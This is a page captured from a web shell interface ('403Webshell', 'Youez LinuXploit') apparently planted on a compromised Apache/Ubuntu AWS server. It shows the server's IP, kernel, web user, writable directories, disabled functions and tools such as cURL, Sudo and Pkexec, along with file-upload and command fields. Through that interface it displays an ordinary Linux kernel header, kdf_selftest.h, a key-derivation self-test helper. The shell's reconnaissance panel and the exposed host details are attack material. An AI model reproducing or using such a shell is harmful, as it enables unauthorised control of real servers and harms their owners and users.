403Webshell
Server IP : 13.213.54.232  /  Your IP : 216.73.216.72
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux ip-172-31-17-110 6.8.0-1029-aws #31~22.04.1-Ubuntu SMP Thu Apr 24 21:16:18 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 7.1.33-67+ubuntu22.04.1+deb.sury.org+1
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/lib/modules/6.8.0-1029-aws/build/include/crypto/internal/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/lib/modules/6.8.0-1029-aws/build/include/crypto/internal/kdf_selftest.h
/* SPDX-License-Identifier: GPL-2.0 */

/*
 * Copyright (C) 2021, Stephan Mueller <smueller@chronox.de>
 */

#ifndef _CRYPTO_KDF_SELFTEST_H
#define _CRYPTO_KDF_SELFTEST_H

#include <crypto/hash.h>
#include <linux/uio.h>

struct kdf_testvec {
	unsigned char *key;
	size_t keylen;
	unsigned char *ikm;
	size_t ikmlen;
	struct kvec info;
	unsigned char *expected;
	size_t expectedlen;
};

static inline int
kdf_test(const struct kdf_testvec *test, const char *name,
	 int (*crypto_kdf_setkey)(struct crypto_shash *kmd,
				  const u8 *key, size_t keylen,
				  const u8 *ikm, size_t ikmlen),
	 int (*crypto_kdf_generate)(struct crypto_shash *kmd,
				    const struct kvec *info,
				    unsigned int info_nvec,
				    u8 *dst, unsigned int dlen))
{
	struct crypto_shash *kmd;
	int ret;
	u8 *buf = kzalloc(test->expectedlen, GFP_KERNEL);

	if (!buf)
		return -ENOMEM;

	kmd = crypto_alloc_shash(name, 0, 0);
	if (IS_ERR(kmd)) {
		pr_err("alg: kdf: could not allocate hash handle for %s\n",
		       name);
		kfree(buf);
		return -ENOMEM;
	}

	ret = crypto_kdf_setkey(kmd, test->key, test->keylen,
				test->ikm, test->ikmlen);
	if (ret) {
		pr_err("alg: kdf: could not set key derivation key\n");
		goto err;
	}

	ret = crypto_kdf_generate(kmd, &test->info, 1, buf, test->expectedlen);
	if (ret) {
		pr_err("alg: kdf: could not obtain key data\n");
		goto err;
	}

	ret = memcmp(test->expected, buf, test->expectedlen);
	if (ret)
		ret = -EINVAL;

err:
	crypto_free_shash(kmd);
	kfree(buf);
	return ret;
}

#endif /* _CRYPTO_KDF_SELFTEST_H */

Youez - 2016 - github.com/yon3zu
LinuXploit